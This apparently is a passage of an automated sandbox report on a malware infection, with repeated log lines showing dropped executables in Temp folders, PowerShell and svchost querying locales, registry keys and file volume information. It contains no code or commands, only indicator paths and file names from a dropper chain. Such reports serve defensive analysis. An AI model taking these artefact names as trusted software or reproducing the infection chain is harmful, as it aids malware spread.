Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: GetLocaleInfoW,20_2_00BF252C
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_00BF2652
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: GetLocaleInfoW,20_2_00BE877E
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: GetLocaleInfoW,20_2_00BF2758
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00BF2827
Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,20_2_00BF1EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,21_2_00CF21B3
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,21_2_00CF2168
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_00CF22D9
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,21_2_00CF224E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: EnumSystemLocalesW,21_2_00CE825C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,21_2_00CF252C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_00CF2652
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,21_2_00CF2758
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetLocaleInfoW,21_2_00CE877E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_00CF2827
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00CF1EC6
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111190101\acd63ce6fe.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111200101\5a57aa51d3.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\10111210101\f0b421a199.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
